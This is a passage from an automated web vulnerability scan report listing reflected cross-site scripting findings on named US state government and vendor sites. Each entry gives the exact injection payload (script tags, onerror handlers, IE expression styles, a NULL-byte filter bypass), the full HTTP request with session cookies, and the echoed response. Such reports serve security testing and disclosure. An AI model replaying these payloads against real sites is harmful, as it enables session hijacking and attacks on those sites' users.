Date: Sat, 30 Apr 2011 11:12:38 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Content-Length: 99

Error. The file was not found. (servlet name = lhChatca390<img src=a onerror=alert(1)>f446d719da6)

3.60. http://newchat.livehelper.com/servlet/lhChat [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newchat.livehelper.com
Path:   /servlet/lhChat

Issue detail

The value of the id request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 84b16%3balert(1)//9158bdd093c was submitted in the id parameter. This input was echoed as 84b16;alert(1)//9158bdd093c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/lhChat?ACTION=GETWINDOWSIZE&c=1099892&id=084b16%3balert(1)//9158bdd093c&noCacheIE=1304161966682 HTTP/1.1
Host: newchat.livehelper.com
Proxy-Connection: keep-alive
Referer: http://ia.gov/livehelp.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 30 Apr 2011 11:12:29 GMT
Content-Type: text/javascript
Connection: keep-alive
P3P: CP: PSAo OUR IND COM NAV INT STA NID DSP NOI COR
Content-Length: 132

var obj;var str ={"windowsize":1};obj = eval(str);var id = parseInt(084b16;alert(1)//9158bdd093c);eval(pool[id].setWindowSize(obj));

3.61. http://nv.gov/workarea/csslib/ektronCss.ashx [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nv.gov
Path:   /workarea/csslib/ektronCss.ashx

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 38767<script>alert(1)</script>6b4af41bd40 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /workarea/csslib/ektronCss.ashx?id=EktronModalCss+EktronThickBoxCss+EktronBubbleCss38767<script>alert(1)</script>6b4af41bd40 HTTP/1.1
Host: nv.gov
Proxy-Connection: keep-alive
Referer: http://nv.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=nv.gov&SiteLanguage=1033; EktGUID=e1ffd717-3c01-4362-9a5b-89256133fb8e; EkAnalytics=newuser; ASP.NET_SessionId=f4dzvey4cafeqrfxihsuhw45

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=31536000
Content-Type: text/css; charset=utf-8
Expires: Sun, 29 Apr 2012 11:15:20 GMT
Last-Modified: Sat, 30 Apr 2011 11:15:20 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 11:15:20 GMT
Content-Length: 11064

.ektronWindow{display:none;position:fixed!important;top:25%;left:50%;margin-left:-20em;width:40em;background-color:#fff;color:#333;border:1px solid #525252;padding:1em;}.ektronModalOverlay{background-
...[SNIP]...
Area/images/application/macFFBgHack.gif') repeat;}

/* ############################################################# */
/* ektron registered stylesheet: css file not found */
/* id: EktronBubbleCss38767<script>alert(1)</script>6b4af41bd40 */
/* path:
/* ############################################################# */


3.62. http://nv.gov/workarea/java/ektronJs.ashx [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nv.gov
Path:   /workarea/java/ektronJs.ashx

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 726f8<script>alert(1)</script>68099bb65cb was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /workarea/java/ektronJs.ashx?id=EktronWebToolBarJS726f8<script>alert(1)</script>68099bb65cb HTTP/1.1
Host: nv.gov
Proxy-Connection: keep-alive
Referer: http://nv.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=nv.gov&SiteLanguage=1033; EktGUID=e1ffd717-3c01-4362-9a5b-89256133fb8e; EkAnalytics=newuser; ASP.NET_SessionId=f4dzvey4cafeqrfxihsuhw45

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=31536000
Content-Type: application/javascript; charset=utf-8
Expires: Sun, 29 Apr 2012 11:15:36 GMT
Last-Modified: Sat, 30 Apr 2011 11:15:36 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 11:15:35 GMT
Content-Length: 266

//################################################################
//ektron registered javascript: js file not found
//id: EktronWebToolBarJS726f8<script>alert(1)</script>68099bb65cb
//path:
//################################################################


3.63. https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php [OLTSite parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://olt.custhelp.com
Path:   /cgi-bin/olt.cfg/php/enduser/acct_login.php

Issue detail

The value of the OLTSite request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fa54"style%3d"x%3aexpression(alert(1))"b886bd6f3e was submitted in the OLTSite parameter. This input was echoed as 6fa54"style="x:expression(alert(1))"b886bd6f3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /cgi-bin/olt.cfg/php/enduser/acct_login.php?OLTSite=%22%20stYle=x:expre/**/ssion(netsparker(9))%20ns=%22%206fa54"style%3d"x%3aexpression(alert(1))"b886bd6f3e&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=3&p_next_page=acct_login.php HTTP/1.1
Host: olt.custhelp.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 21:20:49 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: rnw_enduser_login_start=LOGIN_START; expires=Fri, 29-Apr-2011 21:40:49 GMT
RNT-Time: D=69577 t=1304112049847679
RNT-Machine: 02
Vary: Accept-Encoding
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12015

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en_US">
<!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- -->
...[SNIP]...
<a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=" stYle=x:expre/**/ssion(netsparker(9)) ns=" 6fa54"style="x:expression(alert(1))"b886bd6f3e&p_sid=cYoJIJsk&amp;p_accessibility=0&amp;p_redirect=3">
...[SNIP]...

3.64. https://onestop.michigan.gov/OneStop/ssoNeedPassword.do [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://onestop.michigan.gov
Path:   /OneStop/ssoNeedPassword.do

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 4c601--><img%20src%3da%20onerror%3dalert(1)>687572642ce was submitted in the REST URL parameter 2. This input was echoed as 4c601--><img src=a onerror=alert(1)>687572642ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /OneStop/ssoNeedPassword.do4c601--><img%20src%3da%20onerror%3dalert(1)>687572642ce HTTP/1.1
Host: onestop.michigan.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
connection: close
content-language: en
content-type: text/html; charset=ISO-8859-1
date: Sat, 30 Apr 2011 12:24:47 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 3711
$wsep:
cache-control: no-cache="set-cookie, set-cookie2"
expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: AMWEBJCT!%2Fonestop-main!JSESSIONID=0001Ve_rZqzUAfxMgdZZ9TnjQJg:-D00MP; Path=/


<!-- Michigan Business One Stop Portal: 902 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<ht
...[SNIP]...
<!-- Application Excepiton: java.io.FileNotFoundException: /ssoNeedPassword.do4c601--><img src=a onerror=alert(1)>687572642ce -->
...[SNIP]...

3.65. https://onestop.michigan.gov/onestop-main/OneStop/css/a [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://onestop.michigan.gov
Path:   /onestop-main/OneStop/css/a

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload e949a--><img%20src%3da%20onerror%3dalert(1)>374202c28f was submitted in the REST URL parameter 4. This input was echoed as e949a--><img src=a onerror=alert(1)>374202c28f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /onestop-main/OneStop/css/ae949a--><img%20src%3da%20onerror%3dalert(1)>374202c28f HTTP/1.1
Host: onestop.michigan.gov
Connection: keep-alive
Referer: https://onestop.michigan.gov/onestop-main/OneStop/css/none9d952--%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E97f23fbd84f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PD-S-SESSION-ID-M=2_0_K6WGDkiKA3PMVW10ldzkXmbuPYJIXsdlsERHrZd63x0IV9Ed; AMWEBJCT!%2Fonestop-main!JSESSIONID=0001Ve_rZqzUAfxMgdZZ9TnjQJg:-D00MP

Response

HTTP/1.1 404 Not Found
connection: close
content-language: en-US
content-type: text/html; charset=ISO-8859-1
date: Sat, 30 Apr 2011 12:28:23 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 3697
$wsep:


<!-- Michigan Business One Stop Portal: 902 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<ht
...[SNIP]...
<!-- Application Excepiton: java.io.FileNotFoundException: /css/ae949a--><img src=a onerror=alert(1)>374202c28f -->
...[SNIP]...

3.66. https://onestop.michigan.gov/onestop-main/OneStop/css/none [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://onestop.michigan.gov
Path:   /onestop-main/OneStop/css/none

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 9d952--><img%20src%3da%20onerror%3dalert(1)>97f23fbd84f was submitted in the REST URL parameter 4. This input was echoed as 9d952--><img src=a onerror=alert(1)>97f23fbd84f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /onestop-main/OneStop/css/none9d952--><img%20src%3da%20onerror%3dalert(1)>97f23fbd84f HTTP/1.1
Host: onestop.michigan.gov
Connection: keep-alive
Referer: https://onestop.michigan.gov/OneStop/ssoNeedPassword.do4c601--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E687572642ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AMWEBJCT!%2Fonestop-main!JSESSIONID=00019ZIYB-FVRKrzIwI-8cI81wk:-D00MP

Response

HTTP/1.1 404 Not Found
connection: close
content-language: en-US
content-type: text/html; charset=ISO-8859-1
date: Sat, 30 Apr 2011 12:27:54 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 3701
$wsep:


<!-- Michigan Business One Stop Portal: 902 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<ht
...[SNIP]...
<!-- Application Excepiton: java.io.FileNotFoundException: /css/none9d952--><img src=a onerror=alert(1)>97f23fbd84f -->
...[SNIP]...

3.67. https://onestop.michigan.gov/onestop-main/OneStop/ssoRegistration.do [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://onestop.michigan.gov
Path:   /onestop-main/OneStop/ssoRegistration.do

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 157a1--><img%20src%3da%20onerror%3dalert(1)>d3792cda3df was submitted in the REST URL parameter 3. This input was echoed as 157a1--><img src=a onerror=alert(1)>d3792cda3df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /onestop-main/OneStop/ssoRegistration.do157a1--><img%20src%3da%20onerror%3dalert(1)>d3792cda3df HTTP/1.1
Host: onestop.michigan.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
connection: close
content-language: en
content-type: text/html; charset=ISO-8859-1
date: Sat, 30 Apr 2011 12:24:49 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 3711
$wsep:
cache-control: no-cache="set-cookie, set-cookie2"
expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: AMWEBJCT!%2Fonestop-main!JSESSIONID=0001uBkti1276B3IGohGJh7atYM:-D00MP; Path=/


<!-- Michigan Business One Stop Portal: 902 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<ht
...[SNIP]...
<!-- Application Excepiton: java.io.FileNotFoundException: /ssoRegistration.do157a1--><img src=a onerror=alert(1)>d3792cda3df -->
...[SNIP]...

3.68. https://pixel.fetchback.com/serve/fb/pdc [name parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 6e92b<x%20style%3dx%3aexpression(alert(1))>2055d00ca4c was submitted in the name parameter. This input was echoed as 6e92b<x style=x:expression(alert(1))>2055d00ca4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /serve/fb/pdc?cat=&name=landing6e92b<x%20style%3dx%3aexpression(alert(1))>2055d00ca4c&sid=2293&fb_key2=en-us&fb_key3=0&fb_key1=FBPID284 HTTP/1.1
Host: pixel.fetchback.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 29 Apr 2011 21:19:06 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1304111946; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:19:06 GMT; Path=/
Set-Cookie: uid=1_1304111946_1304111946847:5137826880823579; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:19:06 GMT; Path=/
Set-Cookie: kwd=1_1304111946; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:19:06 GMT; Path=/
Set-Cookie: sit=1_1304111946; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:19:06 GMT; Path=/
Set-Cookie: cre=1_1304111946; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:19:06 GMT; Path=/
Set-Cookie: bpd=1_1304111946; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:19:06 GMT; Path=/
Set-Cookie: apd=1_1304111946; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:19:06 GMT; Path=/
Set-Cookie: scg=1_1304111946; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:19:06 GMT; Path=/
Set-Cookie: ppd=1_1304111946; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:19:06 GMT; Path=/
Set-Cookie: afl=1_1304111946; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:19:06 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Fri, 29 Apr 2011 21:19:06 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- campaign : 'landing6e92b<x style=x:expression(alert(1))>2055d00ca4c' *not* found -->

3.69. http://serverapi.arcgisonline.com/jsapi/arcgis/ [v parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://serverapi.arcgisonline.com
Path:   /jsapi/arcgis/

Issue detail

The value of the v request parameter is copied into the HTML document as plain text between tags. The payload %009332b<script>alert(1)</script>c8ee692dffc was submitted in the v parameter. This input was echoed as 9332b<script>alert(1)</script>c8ee692dffc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /jsapi/arcgis/?v=2.1%009332b<script>alert(1)</script>c8ee692dffc HTTP/1.1
Host: serverapi.arcgisonline.com
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=31536000,public
Content-Type: text/javascript; charset=UTF-8
Date: Sat, 30 Apr 2011 11:23:08 GMT
Expires: Sun, 29 Apr 2012 11:23:08 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Connection: keep-alive
Content-Length: 105

'2.1.9332b<script>alert(1)</script>c8ee692dffc\js\\\\dojo\\dojo\\dojo.xd.js' is not a valid virtual path.

3.70. http://sussex.de.schoolwebpages.com/education/school/school.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sussex.de.schoolwebpages.com
Path:   /education/school/school.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c4954<script>alert(1)</script>14f29a21f60 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /educationc4954<script>alert(1)</script>14f29a21f60/school/school.php HTTP/1.1
Host: sussex.de.schoolwebpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:28:45 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: PHPSESSID=5934cf28e039444eeb4753d2f6b36b61; path=/
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 2813
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
   dir="ltr">
...[SNIP]...
<div style="font-style: italic; font-size: 90%;">educationc4954<script>alert(1)</script>14f29a21f60/school/school.php</div>
...[SNIP]...

3.71. http://sussex.de.schoolwebpages.com/education/school/school.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sussex.de.schoolwebpages.com
Path:   /education/school/school.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 374c9<script>alert(1)</script>9e70c437df3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /education/school374c9<script>alert(1)</script>9e70c437df3/school.php HTTP/1.1
Host: sussex.de.schoolwebpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:28:47 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: PHPSESSID=47e8bdcffbd3ba23755e196867ab537e; path=/
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 2813
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
   dir="ltr">
...[SNIP]...
<div style="font-style: italic; font-size: 90%;">education/school374c9<script>alert(1)</script>9e70c437df3/school.php</div>
...[SNIP]...

3.72. http://sussex.de.schoolwebpages.com/education/school/school.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sussex.de.schoolwebpages.com
Path:   /education/school/school.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 352ac<script>alert(1)</script>4a6fba8476b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /education/school/school.php352ac<script>alert(1)</script>4a6fba8476b HTTP/1.1
Host: sussex.de.schoolwebpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:28:50 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: PHPSESSID=043a059757f64e9d84cf66eecfca78af; path=/
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 2813
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
   dir="ltr">
...[SNIP]...
<div style="font-style: italic; font-size: 90%;">education/school/school.php352ac<script>alert(1)</script>4a6fba8476b</div>
...[SNIP]...

3.73. http://sussex.de.schoolwebpages.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sussex.de.schoolwebpages.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 38e16<script>alert(1)</script>27ee5c4b05f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico38e16<script>alert(1)</script>27ee5c4b05f HTTP/1.1
Host: sussex.de.schoolwebpages.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4ab115b4e5f848a56539d429d9cdbfd8

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 15:10:36 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: Accept-encoding
Connection: close
Content-Type: text/html
Content-Length: 2797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
   dir="ltr">
...[SNIP]...
<div style="font-style: italic; font-size: 90%;">favicon.ico38e16<script>alert(1)</script>27ee5c4b05f</div>
...[SNIP]...

3.74. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tomcat2.dot.state.ga.us
Path:   /ContractsAdministration/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d702d<script>alert(1)</script>fc0fad5692 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ContractsAdministrationd702d<script>alert(1)</script>fc0fad5692/index.cfm HTTP/1.1
Host: tomcat2.dot.state.ga.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:28:50 GMT
Content-Type: text/html; charset=UTF-8
Server: JRun Web Server

<head><title>JRun Servlet Error</title></head><h1>404 File not found: /ContractsAdministrationd702d<script>alert(1)</script>fc0fad5692/index.cfm</h1><body>
File not found: /ContractsAdministrationd70
...[SNIP]...

3.75. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tomcat2.dot.state.ga.us
Path:   /ContractsAdministration/index.cfm

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d4acd<script>alert(1)</script>1b405af27ee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ContractsAdministration/index.cfmd4acd<script>alert(1)</script>1b405af27ee HTTP/1.1
Host: tomcat2.dot.state.ga.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:28:52 GMT
Content-Language: en
Server: JRun Web Server

<head><title>JRun Servlet Error</title></head><h1>404 /ContractsAdministration/index.cfmd4acd<script>alert(1)</script>1b405af27ee</h1><body>
/ContractsAdministration/index.cfmd4acd<script>alert(1)</s
...[SNIP]...

3.76. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tomcat2.dot.state.ga.us
